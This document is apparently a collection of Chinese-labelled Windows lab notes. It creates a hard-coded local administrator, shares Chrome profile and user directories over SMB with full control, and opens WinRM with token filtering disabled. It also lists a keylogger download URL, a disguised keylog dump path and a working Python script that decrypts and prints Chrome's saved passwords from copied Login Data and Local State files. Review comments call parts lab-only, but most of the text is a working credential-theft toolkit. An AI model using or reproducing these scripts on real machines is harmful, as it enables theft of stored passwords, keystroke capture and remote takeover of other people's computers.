实训楼-sbs目录机器适配版本
@echo off
chcp 65001 >nul
:: Multi-directory SMB sharing script, adapted to the current user name and environment.
:: Must be run with administrator privileges (net user / net share / icacls need them);
:: unlike the second script on this page it performs no explicit admin check, so a
:: missing privilege is reported as "user already exists" below.
::
:: NOTE(review): this script exposes the invoking user's Desktop, the Chrome profile
:: directory (the browser's saved-credential store lives under it) and the per-app
:: Packages directory with FULL share permissions to a newly created local
:: administrator whose password is hard-coded here and echoed to the console at the
:: end. The account, the shares and the (OI)(CI)F ACL entries persist after the run;
:: on anything but a throwaway lab machine they should be removed again
:: (net share NAME /delete, net user NAME /delete, icacls DIR /remove NAME).
::
:: Shared account credentials (hard-coded; also printed in the summary).
set SHARE_USER=shareuser
set SHARE_PASSWORD=123123
:: Resolve the current user name: whoami prints DOMAIN\user (or HOST\user); the second
:: loop keeps only the part after the backslash. CURRENT_USER is not referenced again
:: in this script.
for /f "tokens=*" %%i in ('whoami') do set "CURRENT_USER=%%i"
for /f "tokens=2 delims=\" %%i in ("%CURRENT_USER%") do set "CURRENT_USER=%%i"
:: Directories to share, taken from the invoking user's environment.
set DESKTOP=%USERPROFILE%\Desktop
set CHROME_DATA=%LOCALAPPDATA%\Google\Chrome\User Data
set PACKAGES=%LOCALAPPDATA%\Packages
:: Create the share account. The password is passed on the command line, so it is
:: visible to process-creation auditing and to anyone listing processes at that moment.
:: Any non-zero exit (not only "already exists") takes the first branch.
echo [1/6] 创建共享用户 %SHARE_USER%...
net user %SHARE_USER% %SHARE_PASSWORD% /add >nul 2>&1
if %errorLevel% neq 0 (
  echo [提示] 用户已存在,跳过创建
) else (
  echo [成功] 用户创建完成
)
:: Add the account to the local Administrators group (marked optional by the author).
:: Output and exit status are discarded, so a failure here is silent.
echo [2/6] 添加用户到管理员组...
net localgroup administrators %SHARE_USER% /add >nul 2>&1
:: Share each directory via the :share_folder subroutine (args: path, share name).
:: The "[n/6]" step numbering is not continued inside the subroutine.
call :share_folder "%DESKTOP%" desktop
call :share_folder "%CHROME_DATA%" chrome
call :share_folder "%PACKAGES%" package
:: Local IPv4: the 14th whitespace-separated token of each ipconfig line containing
:: "IPv4"; the last matching adapter wins. The token position depends on ipconfig's
:: output language and layout -- TODO confirm on the target build.
for /f "tokens=14 delims= " %%i in ('ipconfig ^| findstr "IPv4"') do set LOCAL_IP=%%i
:: Summary: UNC paths plus the plaintext credentials, printed to the console.
echo.
echo ==========================
echo 所有共享已配置完毕:
echo.
echo \\%COMPUTERNAME%\desktop
echo \\%COMPUTERNAME%\chrome
echo \\%COMPUTERNAME%\package
echo 用户名: %SHARE_USER%
echo 密码: %SHARE_PASSWORD%
echo 本机IP: %LOCAL_IP%
echo ==========================
pause
:: Stop here so execution does not fall through into the subroutine below.
exit /b
:: -----------共享函数------------
:share_folder
:: share_folder DIR SHARENAME
::   %1 - directory to share (quoted); skipped with a message when it does not exist
::   %2 - SMB share name
:: Reads SHARE_USER from the caller. Deletes any existing share of that name, recreates
:: it with FULL share permission for SHARE_USER and adds an inheritable Full Control
:: NTFS ACE on the directory. Only the icacls exit status is checked: a failed
:: "net share" is overwritten by the icacls result and is never reported here
:: (its stdout is suppressed; only its stderr would reach the console).
setlocal
set "TARGET=%~1"
set "SHARENAME=%~2"
if not exist "%TARGET%" (
  echo [跳过] 目录不存在:%TARGET%
  exit /b
)
:: NOTE(review): the unescaped ">" in "->" is parsed by cmd as output redirection,
:: so this line writes "[共享中] DIR -" into a file named after the share in the
:: current directory instead of printing it. Escaping it as "-^>" would print it.
echo [共享中] %TARGET% -> %SHARENAME%
net share %SHARENAME% /delete >nul 2>&1
net share %SHARENAME%="%TARGET%" /grant:%SHARE_USER%,FULL >nul
icacls "%TARGET%" /grant %SHARE_USER%:(OI)(CI)F >nul
if %errorLevel% neq 0 (
  echo [错误] %SHARENAME% 权限设置失败
) else (
  echo [完成] %SHARENAME% 共享完成
)
endlocal
exit /b
图文楼-适配版本
@echo off
chcp 65001 >nul
:: Administrator profile sharing script.
:: Must be run with administrator privileges (checked below via "net session").
::
:: NOTE(review): this shares the entire C:\Users\Administrator profile -- including
:: AppData with browser credential stores, tokens and other secrets -- with FULL share
:: permission and an inheritable Full Control NTFS ACE for a newly created local
:: administrator whose password is hard-coded here and printed at the end. The share,
:: the account and the ACE persist after the run and should be removed when the lab
:: exercise is over (net share NAME /delete, net user NAME /delete, icacls DIR /remove NAME).
::
:: Configuration (hard-coded).
set SHARE_USER=shareuser
set SHARE_PASSWORD=123123
set SHARE_FOLDER=C:\Users\Administrator
set SHARE_NAME=admin
:: Elevation check: "net session" only succeeds in an elevated shell.
net session >nul 2>&1
if %errorLevel% neq 0 (
  echo [错误] 请右键使用"以管理员身份运行"执行本脚本
  pause
  exit /b
)
:: Abort if the profile directory is missing.
if not exist "%SHARE_FOLDER%" (
  echo [错误] 目标目录不存在:%SHARE_FOLDER%
  pause
  exit /b
)
:: Create the share account. The password is on the command line (visible to
:: process-creation auditing); stderr is not suppressed here, so net's own error text
:: is shown in addition to the message below. Any non-zero exit takes the first branch.
echo [1/5] 正在创建共享用户 %SHARE_USER%...
net user %SHARE_USER% %SHARE_PASSWORD% /add >nul
if %errorLevel% neq 0 (
  echo [提示] 用户已存在,跳过创建步骤
) else (
  echo [成功] 用户创建完成
)
:: Make the share account a local administrator.
echo [2/5] 正在将用户加入管理员组...
net localgroup administrators %SHARE_USER% /add >nul
if %errorLevel% neq 0 (
  echo [提示] 用户可能已在管理员组中
) else (
  echo [成功] 已加入管理员组
)
:: Recreate the share (delete any existing one of the same name first) with FULL share
:: permission for the account. A failure here stops the script.
echo [3/5] 正在配置管理员目录共享...
net share %SHARE_NAME% /delete >nul 2>&1
net share %SHARE_NAME%="%SHARE_FOLDER%" /grant:%SHARE_USER%,FULL >nul
if %errorLevel% neq 0 (
  echo [错误] 共享设置失败
  pause
  exit /b
) else (
  echo [成功] 共享配置完成
)
:: NTFS side: inheritable (OI)(CI) Full Control for the account on the whole profile.
echo [4/5] 正在设置共享权限...
icacls "%SHARE_FOLDER%" /grant %SHARE_USER%:(OI)(CI)F >nul
if %errorLevel% neq 0 (
  echo [错误] 权限设置失败
  pause
  exit /b
) else (
  echo [成功] 权限设置完成
)
:: Local IPv4: 14th token of each ipconfig line containing "IPv4"; last adapter wins.
:: The token position depends on ipconfig's output language/layout -- TODO confirm.
for /f "tokens=14 delims= " %%i in ('ipconfig ^| findstr "IPv4"') do set LOCAL_IP=%%i
:: Summary, including the plaintext credentials.
echo [5/5] 正在生成最终配置信息...
echo.
echo ============ 操作完成 ============
echo 本机IPv4地址: %LOCAL_IP%
echo 共享路径: \\%COMPUTERNAME%\%SHARE_NAME%
echo 或使用: \\%LOCAL_IP%\%SHARE_NAME%
echo 共享目录: %SHARE_FOLDER%
echo 用户名: %SHARE_USER%
echo 密码: %SHARE_PASSWORD%
echo 权限: 完全控制(可读可写)
echo =================================
echo.
pause
访问共享目录
:: Client side: map the "admin" share created by the script above as drive Z:,
:: authenticating as the share account. The plaintext password is passed on the
:: command line and therefore lands in shell history and process auditing;
:: "net use Z: \\HOST\admin /user:shareuser *" prompts for it instead.
net use Z: \\192.168.51.3\admin /user:shareuser 123123
文件位置
本地地址
C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Login Data
C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Local State
C:\Users\<USERNAME>\AppData\Local\Packages\Microsoft.Messaging\360se_dump.tmp
远程地址
Z:\AppData\Local\Google\Chrome\User Data\Default
Z:\AppData\Local\Google\Chrome\User Data
Z:\AppData\Local\Packages\Microsoft.Messaging\360se_dump.tmp
keylogs
https://oss.zjun.info/file/keylogger.exe
C:\Users\<USERNAME>\AppData\Local\Packages\Microsoft.Messaging\360se_dump.tmp
chrome.py
import os
import sqlite3
import json
import base64
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
import ctypes
from ctypes import wintypes
# Hard-coded paths of the Chrome profile files this script reads, pointing at a
# local copy on the Administrator desktop: "Login Data" is the SQLite database
# with the `logins` table queried below, "Local State" is the JSON file holding
# `os_crypt.encrypted_key`.
login_data_path: str = r"C:\Users\Administrator\Desktop\ccc\Login Data"
local_state_path: str = r"C:\Users\Administrator\Desktop\ccc\Local State"
class AES_GCM:
    """Thin wrappers around a `cryptography` AES Cipher used in GCM mode.

    Neither method calls finalize() on the context, so no GCM authentication
    tag is ever produced or verified: decrypt() returns whatever update()
    yields, even for tampered or truncated ciphertext.
    """

    @staticmethod
    def encrypt(cipher, plaintext, nonce):
        """Encrypt `plaintext` under `nonce`; returns (cipher, ciphertext, nonce).

        Not called anywhere else in this file. Because finalize() is skipped the
        tag is never generated.
        """
        cipher.mode = modes.GCM(nonce)
        encryptor = cipher.encryptor()
        ciphertext = encryptor.update(plaintext)
        return cipher, ciphertext, nonce

    @staticmethod
    def decrypt(cipher, ciphertext, nonce):
        """Decrypt `ciphertext` under `nonce` without tag verification (no finalize())."""
        cipher.mode = modes.GCM(nonce)
        decryptor = cipher.decryptor()
        return decryptor.update(ciphertext)

    @staticmethod
    def get_cipher(key):
        """Build an AES Cipher with no mode; encrypt/decrypt assign GCM later."""
        cipher = Cipher(algorithms.AES(key), None, backend=default_backend())
        return cipher
def dpapi_decrypt(encrypted):
    """Unprotect a DPAPI blob through crypt32!CryptUnprotectData via ctypes.

    Args:
        encrypted: bytes of the DPAPI blob.
    Returns:
        The unprotected bytes, or None when anything inside the try block
        raises. The exception is printed rather than propagated, so callers
        receive None and presumably fail later (e.g. when it is used as an AES
        key). On non-Windows hosts `ctypes.windll` does not exist; that
        AttributeError is swallowed by the same handler.
    """
    class DATA_BLOB(ctypes.Structure):
        # Mirrors the Win32 DATA_BLOB layout: byte count plus pointer to the bytes.
        _fields_ = [('cbData', wintypes.DWORD),
                    ('pbData', ctypes.POINTER(ctypes.c_char))]
    try:
        p = ctypes.create_string_buffer(encrypted, len(encrypted))
        blobin = DATA_BLOB(ctypes.sizeof(p), p)
        blobout = DATA_BLOB()
        # Output buffer is allocated by the OS; it is copied out below but never
        # released (the Win32 contract expects a LocalFree on blobout.pbData).
        retval = ctypes.windll.crypt32.CryptUnprotectData(
            ctypes.byref(blobin), None, None, None, None, 0, ctypes.byref(blobout))
        if not retval:
            raise ctypes.WinError()
        result = ctypes.string_at(blobout.pbData, blobout.cbData)
        return result
    except Exception as e:
        print(f"Error in dpapi_decrypt: {e}")
        return None
def get_key_from_local_state() -> str:
    """Return the base64 `os_crypt.encrypted_key` string from the Local State file.

    Only the first line is read (readline), so the JSON is assumed to be on a
    single line; a pretty-printed file would fail to parse. Raises KeyError if
    the `os_crypt` section or key is absent.
    """
    with open(local_state_path, encoding='utf-8', mode="r") as f:
        jsn = json.loads(str(f.readline()))
    return jsn["os_crypt"]["encrypted_key"]
def aes_decrypt(encrypted_txt: bytes) -> bytes:
    """Decrypt a 'v10'-prefixed blob with the key recovered from Local State.

    Layout assumed by the slicing: bytes 0-2 are the version prefix, 3-14 the
    12-byte GCM nonce, 15.. the ciphertext (whatever trailing tag is present is
    decrypted as data, not verified -- see AES_GCM). The stored key is
    base64-decoded and its first 5 bytes dropped before being DPAPI-unprotected.
    The key is re-read and re-unprotected on every call.
    """
    encoded_key = get_key_from_local_state()
    encrypted_key = base64.b64decode(encoded_key.encode())
    # Skip the 5-byte prefix that precedes the DPAPI blob in Local State.
    encrypted_key = encrypted_key[5:]
    key = dpapi_decrypt(encrypted_key)  # None on failure; AES(None) below presumably raises
    nonce = encrypted_txt[3:15]
    cipher = AES_GCM.get_cipher(key)
    return AES_GCM.decrypt(cipher, encrypted_txt[15:], nonce)
def chrome_decrypt(encrypted_txt: bytes) -> str | None:
    """Dispatch on the blob prefix and return the plaintext as a str.

    Returns None implicitly when neither prefix matches. In the 'v10' branch the
    last 16 bytes of the decrypted output are discarded (presumably the GCM tag,
    which was decrypted as data and never verified). Both branches call
    .decode(), which raises on non-UTF-8 output or on None from a failed
    dpapi_decrypt.
    """
    if encrypted_txt[:4] == b'x01x00x00x00':
        decrypted_txt = dpapi_decrypt(encrypted_txt)
        return decrypted_txt.decode()
    elif encrypted_txt[:3] == b'v10':
        decrypted_txt = aes_decrypt(encrypted_txt)
        return decrypted_txt[:-16].decode()
def query_logindata(url: str) -> list[tuple]:
    """Read (origin_url, username_value, password_value) rows from `logins`.

    Args:
        url: when truthy, restrict rows to this exact origin_url; an empty
             string (the only value used in this file) returns every row.
    Returns:
        List of 3-tuples; password_value is still the encrypted blob.

    Security note: `url` is interpolated into the SQL text unescaped. If it is
    ever taken from outside this file, pass it as a bound parameter
    (`where origin_url = ?` with `conn.execute(sql, (url,))`) instead.
    Note: the sqlite3 context manager commits/rolls back but does not close the
    connection.
    """
    if url:
        sql = f"select origin_url, username_value, password_value from logins where origin_url = '{url}'"
    else:
        sql = "select origin_url, username_value, password_value from logins"
    with sqlite3.connect(login_data_path) as conn:
        result = conn.execute(sql).fetchall()
    return result
if __name__ == '__main__':
    print("Decrypt Login Data:")
    logindata = query_logindata("")  # a URL can be passed to filter a specific site
    for data in logindata:
        # (origin_url, username, decrypted password) -- written in plaintext to stdout.
        login = data[0], data[1], chrome_decrypt(data[2])
        print(login)
B端
# Target ("B") side: enable WinRM (remote PowerShell) and start its service/listener.
Enable-PSRemoting -Force
# Create the remote-access account as a local administrator. The password is
# hard-coded and passed on the command line (visible to process-creation auditing).
net user shareuser 123123 /add
net localgroup administrators shareuser /add
# Firewall: allow the inbound WinRM HTTP listener. This is the non-TLS rule; the
# HTTPS listener/rule is not configured here.
Enable-NetFirewallRule -Name "WINRM-HTTP-In-TCP"
# Optional: confirm the listener is present.
winrm enumerate winrm/config/listener
# Disable remote UAC token filtering so that every local account in the
# Administrators group (not only the built-in Administrator) receives a full,
# unfiltered token over the network and can remotely control the machine.
# NOTE(review): this is a deliberate hardening regression -- it turns any leaked
# local-admin password (including the one set above) into full remote control of
# the host. Scope it to the lab and revert afterwards (-Value 0 or remove the value).
New-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" `
    -Name "LocalAccountTokenFilterPolicy" -Value 1 -PropertyType DWord -Force
# Apply policy changes.
gpupdate /force
B端-更新版
# Target ("B") side, updated version. Differs from the first version by also
# enabling and re-passwording the existing Administrator and sbs accounts.
#
# NOTE(review): enabling the built-in Administrator account and setting it (and sbs)
# to the same trivial password, combined with LocalAccountTokenFilterPolicy=1 below,
# gives anyone who can reach WinRM on this host full remote administrative access
# with a guessable credential. Treat every step here as lab-only and revert it after
# the exercise (disable the accounts again, rotate the passwords, reset the policy).
#
# Make sure the accounts are enabled (guards against a disabled Administrator).
Get-LocalUser -Name "Administrator","sbs" | Enable-LocalUser
# Optional: set passwords for these accounts (in case none is set). Passwords on the
# command line are recorded by command-line auditing.
net user Administrator 123123
net user sbs 123123
# Intended as a membership check. NOTE(review): "net localgroup GROUP USER" without
# /add or /delete is not a query form and presumably just prints usage; the actual
# membership changes are the /add calls further down.
net localgroup administrators Administrator
net localgroup administrators sbs
# Enable WinRM (remote PowerShell).
Enable-PSRemoting -Force
# Create the remote-access account (optional), as a local administrator.
net user shareuser 123123 /add
net localgroup administrators shareuser /add
# Enable the built-in Administrator (duplicate of the first Enable-LocalUser above).
Get-LocalUser -Name "Administrator" | Enable-LocalUser
# Firewall: allow the inbound WinRM HTTP (non-TLS) listener.
Enable-NetFirewallRule -Name "WINRM-HTTP-In-TCP"
# Disable remote UAC token filtering: every local Administrators member gets a full
# token over the network, not only the built-in Administrator. Hardening regression;
# revert with -Value 0 when done.
New-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" `
    -Name "LocalAccountTokenFilterPolicy" -Value 1 -PropertyType DWord -Force
# Ensure Administrator and sbs are members of the local Administrators group.
net localgroup administrators Administrator /add
net localgroup administrators sbs /add
# Apply policy changes.
gpupdate /force
A端
# Client ("A") side: allow WinRM connections to a non-domain machine by adding it to
# the client's TrustedHosts list.
# NOTE(review): a host on this list is trusted without the identity check Kerberos
# would provide, so the client will hand the supplied credentials to whatever answers
# at that address. Keep it scoped to the single lab IP as done here (never "*"), and
# note that Set-Item without -Concatenate replaces any existing list.
Set-Item WSMan:\localhost\Client\TrustedHosts -Value 192.168.51.3 -Force
# Optional: check that the WinRM service on the target responds.
Test-WSMan 192.168.51.3
-.-